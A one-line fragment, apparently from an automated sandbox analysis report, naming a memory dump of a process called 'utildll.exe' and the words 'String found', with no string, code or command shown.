                      Source: utildll.exe, 00000007.00000002.521164641.0000000002AB2000.00000004.00000001.sdmpString found